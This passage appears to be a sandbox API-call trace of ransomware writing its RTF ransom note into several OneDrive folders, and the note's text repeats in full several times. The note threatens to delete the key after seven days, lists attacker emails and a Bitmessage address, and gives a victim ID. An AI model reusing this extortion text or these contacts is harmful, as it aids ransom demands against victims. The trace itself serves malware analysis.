sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.675] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0298.675] WriteFile (in: hFile=0x2ec, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.675] CloseHandle (hObject=0x2ec) returned 1 [0298.675] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\#readme_eman#.rtf")) returned 0x20 [0298.676] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\adm\\#readme_eman#.rtf")) returned 0x20 [0298.676] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ar\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ar\\#readme_eman#.rtf")) returned 0xffffffff [0298.676] GetLastError () returned 0x2 [0298.676] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ar\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ar\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0298.677] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR 